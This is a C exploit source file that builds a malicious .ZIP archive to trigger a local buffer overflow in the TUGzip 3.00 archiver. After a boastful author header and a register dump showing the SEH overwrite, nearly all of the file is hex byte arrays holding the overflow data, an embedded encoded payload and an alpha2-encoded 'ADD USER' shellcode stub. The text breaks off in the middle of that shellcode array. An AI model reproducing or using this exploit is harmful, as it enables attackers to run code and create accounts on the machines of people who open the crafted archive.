/*0day TUGzip 3.00 archiver .ZIP File Local Buffer Overflow
"If you change things ,forever,there's no going back,you see for them you're just a freak, like me ..Mhaaaahaaaaaaaaaaaaaaaaaaaa"(JK)
Well hello there ,greetz from Romania,here is a exploit for the archiver TUGzip.
So the payload doesen't always execute,it's just a matter of patience,from 10
attemps you get success on 2 in the best case.Got 3 more archivers with stack
overflow and heap overflow,I'm bored... I'm looking for a new approach,will see
soon what I'm going to bring you.
"Let's put a smile on that face Mhaaaaaaaaahhaaahaaahhhhhhaaaaaaaaaaaaaaaaaa"
Credits go to Stefan Marin or fl0 fl0w :) .
All the best !
Registers
EAX 00000000
ECX 00000064
EDX 0013F6D0
EBX 0117ABDC
ESP 0013F6D0
EBP 45444342
ESI 0117AF6C
EDI 00D88B1C
EIP 58585858
SEH chain of main thread, item 0
Address=0013F6D0
SE handler=C9C9C9C9
*/
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<windows.h>
#define OFFSET 2504
#define NOP 2515
#define shellcode_offset 2535
char file_1[]=
"\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x08\x00\x00\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x66\x66\x64\x73\x75\x69\x62\x7A\x65\x6F\x69\x76\x7A\x20\x66\x68"
"\x65\x6F\x20\x79\x66\x6F\x7A\x69\x61\x71\x20\x6F\x69\x65\x61\x7A"
"\x75\x20\x7A\x71\x6F\x66\x68\x75\x65\x7A\x71\x6F\x69\x65\x6E\x66"
"\x65\x7A\x6A\x75\x71\x63\x62\x75\x71\x70\x7A\x61\x7A\x69\x27\x74"
"\x75\x72\x65\x6F\x7A\x6E\x62\x69\x6A\x75\x76\x62\x67\x73\x64\x75"
"\x69\x71\x79\x72\x7A\x61\x6A\x20\x62\x63\x73\x64\x6F\x70\x69\x75"
"\x72\x79\x7A\x6F\x65\x61\x71\x6E\x62\x69\x6F\x64\x73\x79\x72\x66"
"\x65\x7A\x71\x6F\x69\x70\x62\x75\x66\x63\x73\x71\x69\x75\x79\x72"
"\x61\x7A\x62\x69\x6A\x65\x66\x62\x68\x73\x75\x69\x71\x76\x64\x73"
"\x71\x69\x6A\x62\x66\x65\x7A\x71\x75\x61\x66\x64\x64\x64\x64\x64"
"\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x68\x68"
"\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x75\x75\x75"
"\x75\x75\x75\x75\x75\x75\x75\x75\x68\x76\x71\x24\x69\x66\x72\x7A"
"\x65\x6F\x62\x76\x69\x6F\x7A\x65\x71\x66\x74\x72\x65\x6F\x7A\x71"
"\x6A\x6E\x62\x76\x64\x73\x70\x69\x79\x75\x66\x71\x6F\x65\x69\x68"
"\x66\x72\x6F\x75\x65\x7A\x68\x61\x72\x62\x20\x69\x76\x66\x64\x73"
"\x70\x6F\x68\x6A\x72\x65\x71\x6F\x75\x68\x66\x7A\x65\x61\x71\x75"
"\x68\x76\x71\x6F\x75\x68\x65\x66\x6F\x71\x73\x69\x6A\x68\x64\x6F"
"\x73\x71\x68\x76\x64\x6F\x69\x68\x7A\x61\x71\x6F\x65\x69\x68\x66"
"\x64\x73\x6F\x69\x75\x68\x76\x63\x78\x77\x69\x75\x68\x66\x71\x6F"
"\x75\x69\x68\x76\x77\x78\x6F\x69\x68\x66\x64\x73\x71\x6F\x69\x68"
"\x76\x64\x73\x71\x6F\x69\x75\x68\x7A\x67\x66\x6F\x69\x68\x73\x64"
"\x71\x6F\x69\x75\x68\x67\x7A\x65\x71\x6F\x69\x68\x67\x73\x71\x6F"
"\x69\x68\x67\x7A\x61\x65\x7A\x72\x75\x79\x61\x75\x79\x74\x61\x65"
"\x70\x69\x75\x79\x55\x59\x54\x4F\x5A\x52\x45\x50\x49\x48\x47\x41"
"\x5A\x55\x59\x56\x44\x53\x4F\x49\x59\x54\x41\x50\x4F\x49\x55\x45"
"\x59\x52\x49\x55\x45\x5A\x59\x47\x42\x4B\x4A\x43\x58\x4E\x4B\x56"
"\x4E\x4B\x43\x58\x42\x57\x56\x4B\x4A\x4E\x42\x43\x58\x48\x42\x4B"
"\x4A\x44\x48\x46\x4F\x49\x48\x5A\x45\x52\x4F\x49\x55\x48\x45\x5A"
"\x55\x49\x4F\x41\x42\x45\x5A\x55\x49\x42\x47\x55\x49\x56\x43\x50"
"\x4C\x44\x53\x47\x57\x4B\x52\x54\x42\x4E\x49\x55\x43\x49\x55\x4F"
"\x51\x45\x42\x48\x52\x55\x49\x59\x44\x46\x51\x50\x5A\x49\x55\x45"
"\x52\x50\x49\x55\x44\x59\x46\x54\x50\x41\x49\x5A\x55\x45\x59\x52"
"\x5A\x45\x55\x48\x52\x54\x49\x55\x50\x56\x58\x57\x4B\x4A\x43\x4E"
"\x48\x42\x47\x50\x46\x4F\x49\x55\x50\x41\x49\x52\x59\x45\x5A\x4F"
"\x41\x49\x54\x59\x38\x37\x33\x32\x39\x35\x36\x35\x39\x34\x38\x33"
"\x32\x36\x35\x46\x53\x34\x38\x59\x46\x44\x53\x39\x38\x59\x55\x56"
"\x47\x30\x39\x38\x51\x59\x55\x52\x30\x39\x38\x34\x59\x35\x32\x33"
"\x39\x38\x41\x59\x39\x46\x38\x45\x51\x59\x5A\x35\x39\x38\x59\x36"
"\x39\x38\x46\x47\x59\x39\x38\x51\x59\x39\x47\x46\x44\x53\x55\x59"
"\x30\x39\x48\x34\x5A\x48\x33\x37\x38\x35\x32\x33\x31\x42\x34\x47"
"\x38\x30\x47\x46\x44\x53\x55\x49\x42\x56\x51\x49\x55\x4F\x59\x50"
"\x52\x39\x5A\x48\x46\x44\x53\x51\x55\x49\x47\x46\x47\x44\x55\x53"
"\x53\x53\x53\x53\x45\x47\x46\x39\x32\x47\x35\x33\x34\x55\x47\x46"
"\x39\x49\x53\x50\x47\x42\x55\x54\x50\x5A\x39\x38\x59\x35\x33\x41"
"\x41\x42\x43\x43\x46\x52\x45\x43\x43\x45\x54\x52\x45\x5A\x47\x52"
"\x46\x44\x53\x49\x4F\x5A\x48\x45\x52\x42\x4E\x4F\x56\x46\x44\x53"
"\x4F\x49\x52\x48\x54\x4F\x5A\x49\x4E\x46\x47\x44\x4B\x4E\x46\x43"
"\x58\x4C\x4B\x59\x89\x05\x8A\x9B\x98\x98\x98\x4F\x49\x49\x49\x49"
"\x49\x49\x51\x5A\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42"
"\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48"
"\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44"
"\x41\x56\x58\x34\x5A\x38\x42\x44\x4A\x4F\x4D\x4E\x4F\x4C\x36\x4B"
"\x4E\x4D\x54\x4A\x4E\x49\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x42\x36\x4B"
"\x38\x4E\x46\x46\x42\x46\x42\x4B\x58\x45\x44\x4E\x43\x4B\x38\x4E"
"\x37\x45\x30\x4A\x57\x41\x50\x4F\x4E\x4B\x48\x4F\x34\x4A\x51\x4B"
"\x38\x4F\x45\x42\x32\x41\x30\x4B\x4E\x49\x44\x4B\x38\x46\x43\x4B"
"\x58\x41\x50\x50\x4E\x41\x43\x42\x4C\x49\x59\x4E\x4A\x46\x58\x42"
"\x4C\x46\x37\x47\x30\x41\x4C\x4C\x4C\x4D\x30\x41\x30\x44\x4C\x4B"
"\x4E\x46\x4F\x4B\x33\x46\x35\x46\x32\x4A\x52\x45\x57\x45\x4E\x4B"
"\x48\x4F\x35\x46\x42\x41\x30\x4B\x4E\x48\x36\x4B\x58\x4E\x50\x4B"
"\x54\x4B\x48\x4F\x35\x4E\x41\x41\x30\x4B\x4E\x43\x30\x4E\x52\x4B"
"\x58\x49\x48\x4E\x56\x46\x32\x4E\x31\x41\x36\x43\x4C\x41\x43\x4B"
"\x4D\x46\x56\x4B\x48\x43\x44\x42\x53\x4B\x48\x42\x44\x4E\x50\x4B"
"\x38\x42\x37\x4E\x41\x4D\x4A\x4B\x48\x42\x44\x4A\x30\x50\x45\x4A"
"\x36\x50\x38\x50\x44\x50\x30\x4E\x4E\x42\x35\x4F\x4F\x48\x4D\x48"
"\x46\x43\x45\x48\x56\x4A\x46\x43\x43\x44\x33\x4A\x56\x47\x37\x43"
"\x37\x44\x43\x4F\x55\x46\x45\x4F\x4F\x42\x4D\x4A\x36\x4B\x4C\x4D"
"\x4E\x4E\x4F\x4B\x33\x42\x55\x4F\x4F\x48\x4D\x4F\x45\x49\x58\x45"
"\x4E\x48\x56\x41\x48\x4D\x4E\x4A\x50\x44\x30\x45\x35\x4C\x36\x44"
"\x50\x4F\x4F\x42\x4D\x4A\x36\x49\x4D\x49\x50\x45\x4F\x4D\x4A\x47"
"\x45\x4F\x4F\x48\x4D\x43\x55\x43\x45\x43\x35\x43\x35\x43\x35\x43"
"\x54\x43\x55\x43\x54\x43\x35\x4F\x4F\x42\x4D\x48\x46\x4A\x56\x41"
"\x41\x4E\x45\x48\x56\x43\x45\x49\x48\x41\x4E\x45\x59\x4A\x46\x46"
"\x4A\x4C\x31\x42\x57\x47\x4C\x47\x55\x4F\x4F\x48\x4D\x4C\x36\x42"
"\x41\x41\x35\x45\x45\x4F\x4F\x42\x4D\x4A\x56\x46\x4A\x4D\x4A\x50"
"\x32\x49\x4E\x47\x35\x4F\x4F\x48\x4D\x43\x55\x45\x45\x4F\x4F\x42"
"\x4D\x4A\x56\x45\x4E\x49\x54\x48\x58\x49\x44\x47\x45\x4F\x4F\x48"
"\x4D\x42\x35\x46\x55\x46\x55\x45\x55\x4F\x4F\x42\x4D\x43\x39\x4A"
"\x36\x47\x4E\x49\x47\x48\x4C\x49\x57\x47\x45\x4F\x4F\x48\x4D\x45"
"\x55\x4F\x4F\x42\x4D\x48\x46\x4C\x56\x46\x36\x48\x36\x4A\x56\x43"
"\x46\x4D\x36\x49\x48\x45\x4E\x4C\x46\x42\x45\x49\x35\x49\x32\x4E"
"\x4C\x49\x38\x47\x4E\x4C\x56\x46\x34\x49\x58\x44\x4E\x41\x43\x42"
"\x4C\x43\x4F\x4C\x4A\x50\x4F\x44\x54\x4D\x32\x50\x4F\x44\x34\x4E"
"\x52\x43\x39\x4D\x38\x4C\x37\x4A\x33\x4B\x4A\x4B\x4A\x4B\x4A\x4A"
"\x56\x44\x57\x50\x4F\x43\x4B\x48\x41\x4F\x4F\x45\x37\x46\x44\x4F"
"\x4F\x48\x4D\x4B\x45\x47\x45\x44\x55\x41\x35\x41\x45\x41\x35\x4C"
"\x36\x41\x30\x41\x55\x41\x45\x45\x45\x41\x45\x4F\x4F\x42\x4D\x4A"
"\x46\x4D\x4A\x49\x4D\x45\x30\x50\x4C\x43\x55\x4F\x4F\x48\x4D\x4C"
"\x36\x4F\x4F\x4F\x4F\x47\x43\x4F\x4F\x42\x4D\x4B\x48\x47\x45\x4E"
"\x4F\x43\x58\x46\x4C\x46\x46\x4F\x4F\x48\x4D\x44\x45\x4F\x4F\x42"
"\x4D\x4A\x56\x42\x4F\x4C\x48\x46\x50\x4F\x45\x43\x55\x4F\x4F\x48"
"\x4D\x4F\x4F\x42\x4D\x5A\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x41\x49\x89\x04\x02\x12\x01\x61\x82\xFD\x81\x98\x98\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x2E\x74"
"\x78\x74\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC"
"\xCE\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x08"
"\x00\x00\x00\x00\x00\x00\x01\x00\x24\x00\x00\x00\x00\x00\x00\x00"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45"
"\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x43\x43\x43\x43\x43\x43\x43\x43\x43"
"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x41\x42\x43\x44\x45\x58\x58\x58\x58\x41\x41\x41\x41";
char file_2[]=
"\x41\x41\x41\x41\xCC\xCC\xCC\xCC\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x4A\x4A\x4A\x4A\x4A\x4A"
"\x4A\x4A\x4A\x4A\x4A\x4A\x4A\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B"
"\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x4B\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x4C"
"\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x4C\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x4D\x4D\x4D\x4D\x4D\x4D\x4D\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x4E\x4E\x4E\x4E\x4E\x4E\x4E\x4E\x4E\x4E"
"\x4E\x4E\x4E\x4E\x4E\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x4F\x4F\x4F\x4F"
"\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x4F\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x50\x50\x50\x50\x50\x50"
"\x50\x50\x50\x50\x50\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x51\x51\x51\x51\x51\x51\x51"
"\x51\x51\x32\x32\x32\x32\x32\x89\x03\x59\x89\x05\x8A\x9B\x98\x98"
"\x98\x4F\x49\x49\x49\x49\x49\x49\x51\x5A\x56\x54\x58\x36\x33\x30"
"\x56\x58\x34\x41\x30\x42\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56"
"\x58\x32\x42\x44\x42\x48\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42"
"\x44\x51\x42\x30\x41\x44\x41\x56\x58\x34\x5A\x38\x42\x44\x4A\x4F"
"\x4D\x4E\x4F\x4C\x36\x4B\x4E\x4D\x54\x4A\x4E\x49\x4F\x4F\x4F\x4F"
"\x4F\x4F\x4F\x42\x36\x4B\x38\x4E\x46\x46\x42\x46\x42\x4B\x58\x45"
"\x44\x4E\x43\x4B\x38\x4E\x37\x45\x30\x4A\x57\x41\x50\x4F\x4E\x4B"
"\x48\x4F\x34\x4A\x51\x4B\x38\x4F\x45\x42\x32\x41\x30\x4B\x4E\x49"
"\x44\x4B\x38\x46\x43\x4B\x58\x41\x50\x50\x4E\x41\x43\x42\x4C\x49"
"\x59\x4E\x4A\x46\x58\x42\x4C\x46\x37\x47\x30\x41\x4C\x4C\x4C\x4D"
"\x30\x41\x30\x44\x4C\x4B\x4E\x46\x4F\x4B\x33\x46\x35\x46\x32\x4A"
"\x52\x45\x57\x45\x4E\x4B\x48\x4F\x35\x46\x42\x41\x30\x4B\x4E\x48"
"\x36\x4B\x58\x4E\x50\x4B\x54\x4B\x48\x4F\x35\x4E\x41\x41\x30\x4B"
"\x4E\x43\x30\x4E\x52\x4B\x58\x49\x48\x4E\x56\x46\x32\x4E\x31\x41"
"\x36\x43\x4C\x41\x43\x4B\x4D\x46\x56\x4B\x48\x43\x44\x42\x53\x4B"
"\x48\x42\x44\x4E\x50\x4B\x38\x42\x37\x4E\x41\x4D\x4A\x4B\x48\x42"
"\x44\x4A\x30\x50\x45\x4A\x36\x50\x38\x50\x44\x50\x30\x4E\x4E\x42"
"\x35\x4F\x4F\x48\x4D\x48\x46\x43\x45\x48\x56\x4A\x46\x43\x43\x44"
"\x33\x4A\x56\x47\x37\x43\x37\x44\x43\x4F\x55\x46\x45\x4F\x4F\x42"
"\x4D\x4A\x36\x4B\x4C\x4D\x4E\x4E\x4F\x4B\x33\x42\x55\x4F\x4F\x48"
"\x4D\x4F\x45\x49\x58\x45\x4E\x48\x56\x41\x48\x4D\x4E\x4A\x50\x44"
"\x30\x45\x35\x4C\x36\x44\x50\x4F\x4F\x42\x4D\x4A\x36\x49\x4D\x49"
"\x50\x45\x4F\x4D\x4A\x47\x45\x4F\x4F\x48\x4D\x43\x55\x43\x45\x43"
"\x35\x43\x35\x43\x35\x43\x54\x43\x55\x43\x54\x43\x35\x4F\x4F\x42"
"\x4D\x48\x46\x4A\x56\x41\x41\x4E\x45\x48\x56\x43\x45\x49\x48\x41"
"\x4E\x45\x59\x4A\x46\x46\x4A\x4C\x31\x42\x57\x47\x4C\x47\x55\x4F"
"\x4F\x48\x4D\x4C\x36\x42\x41\x41\x35\x45\x45\x4F\x4F\x42\x4D\x4A"
"\x56\x46\x4A\x4D\x4A\x50\x32\x49\x4E\x47\x35\x4F\x4F\x48\x4D\x43"
"\x55\x45\x45\x4F\x4F\x42\x4D\x4A\x56\x45\x4E\x49\x54\x48\x58\x49"
"\x44\x47\x45\x4F\x4F\x48\x4D\x42\x35\x46\x55\x46\x55\x45\x55\x4F"
"\x4F\x42\x4D\x43\x39\x4A\x36\x47\x4E\x49\x47\x48\x4C\x49\x57\x47"
"\x45\x4F\x4F\x48\x4D\x45\x55\x4F\x4F\x42\x4D\x48\x46\x4C\x56\x46"
"\x36\x48\x36\x4A\x56\x43\x46\x4D\x36\x49\x48\x45\x4E\x4C\x46\x42"
"\x45\x49\x35\x49\x32\x4E\x4C\x49\x38\x47\x4E\x4C\x56\x46\x34\x49"
"\x58\x44\x4E\x41\x43\x42\x4C\x43\x4F\x4C\x4A\x50\x4F\x44\x54\x4D"
"\x32\x50\x4F\x44\x34\x4E\x52\x43\x39\x4D\x38\x4C\x37\x4A\x33\x4B"
"\x4A\x4B\x4A\x4B\x4A\x4A\x56\x44\x57\x50\x4F\x43\x4B\x48\x41\x4F"
"\x4F\x45\x37\x46\x44\x4F\x4F\x48\x4D\x4B\x45\x47\x45\x44\x55\x41"
"\x35\x41\x45\x41\x35\x4C\x36\x41\x30\x41\x55\x41\x45\x45\x45\x41"
"\x45\x4F\x4F\x42\x4D\x4A\x46\x4D\x4A\x49\x4D\x45\x30\x50\x4C\x43"
"\x55\x4F\x4F\x48\x4D\x4C\x36\x4F\x4F\x4F\x4F\x47\x43\x4F\x4F\x42"
"\x4D\x4B\x48\x47\x45\x4E\x4F\x43\x58\x46\x4C\x46\x46\x4F\x4F\x48"
"\x4D\x44\x45\x4F\x4F\x42\x4D\x4A\x56\x42\x4F\x4C\x48\x46\x50\x4F"
"\x45\x43\x55\x4F\x4F\x48\x4D\x4F\x4F\x42\x4D\x5A\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x41\x49\x89\x04\x02\x12\x01\x61"
"\x82\xFD\x81\x98\x98\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x2E\x74\x78\x74\x50\x4B\x05\x06\x00\x00\x00\x00"
"\x01\x00\x01\x00\x42\x08\x00\x00\x32\x08\x00\x00";
char shellcode_1[]=
// Skylined's alpha2 unicode decoder
//Un-encoded ADD USER shellcode
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABA"
"BABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JB"
// Encoded opcodes
